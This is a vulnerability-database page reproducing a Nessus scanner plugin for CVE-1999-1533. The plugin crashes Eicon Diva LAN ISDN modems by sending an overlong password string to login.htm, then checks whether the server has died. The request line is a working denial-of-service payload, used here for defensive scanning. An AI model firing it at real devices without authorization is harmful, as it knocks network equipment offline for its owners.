Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 1999-2018 Tenable Network Security, Inc.EICON_MODEM_DOS.NASL
HistorySep 28, 1999 - 12:00 a.m.

Eicon Technology Diva LAN ISDN Modem login.htm Long password Field DoS

1999-09-2800:00:00
This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.
www.tenable.com
41
JSON

The remote host appears to be an Eicon Technology Diva LAN ISDN modem.

Nessus crashed the modem by supplying a long password to the login page. This is likely due to a buffer overflow. A remote attacker could exploit this by repeatedly disabling the modem.

#
# (C) Tenable Network Security, Inc.
#

include("compat.inc");

if (description)
{
 script_id(10062);
 script_version("1.35");
 script_cvs_date("Date: 2018/11/15 20:50:21");

 script_cve_id("CVE-1999-1533");
 script_bugtraq_id(665);

 script_name(english:"Eicon Technology Diva LAN ISDN Modem login.htm Long password Field DoS");
 script_summary(english:"overflows a remote buffer");

 script_set_attribute(attribute:"synopsis", value:"The remote modem has a denial of service vulnerability.");
 script_set_attribute(attribute:"description", value:
"The remote host appears to be an Eicon Technology Diva LAN ISDN modem.

Nessus crashed the modem by supplying a long password to the login
page. This is likely due to a buffer overflow. A remote attacker could
exploit this by repeatedly disabling the modem.");
 script_set_attribute(attribute:"see_also", value:"https://marc.info/?l=bugtraq&m=93846522511387&w=2");
 script_set_attribute(attribute:"solution", value:"Upgrade to the latest version of this modem's firmware.");
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C");
 script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"true");

 script_set_attribute(attribute:"vuln_publication_date", value:"1999/09/26");
 script_set_attribute(attribute:"plugin_publication_date", value:"1999/09/28");

 script_set_attribute(attribute:"potential_vulnerability", value:"true");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();

 script_category(ACT_DENIAL);
 script_family(english:"Denial of Service");

 script_copyright(english:"This script is Copyright (C) 1999-2018 Tenable Network Security, Inc.");

 script_dependencies("http_version.nasl", "no404.nasl");
 script_require_keys("Settings/ParanoidReport");
 script_require_ports("Services/www", 80);

 exit(0);
}

include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");

if (report_paranoia < 2) audit(AUDIT_PARANOID);

port = get_http_port(default:80);

if (http_is_dead(port:port))
 exit(0, "The web server on port "+port+" is already dead.");

r = http_send_recv3(port:port, method:"GET", item: string("/login.htm?password=", crap(200)), exit_on_fail: 0);
if (http_is_dead(port:port, retry: 2)) security_hole(port);

Related

cve 1
cve
cve
CVE-1999-1533
1999-11-07 05:00:00
JSON
Related for EICON_MODEM_DOS.NASL
cve1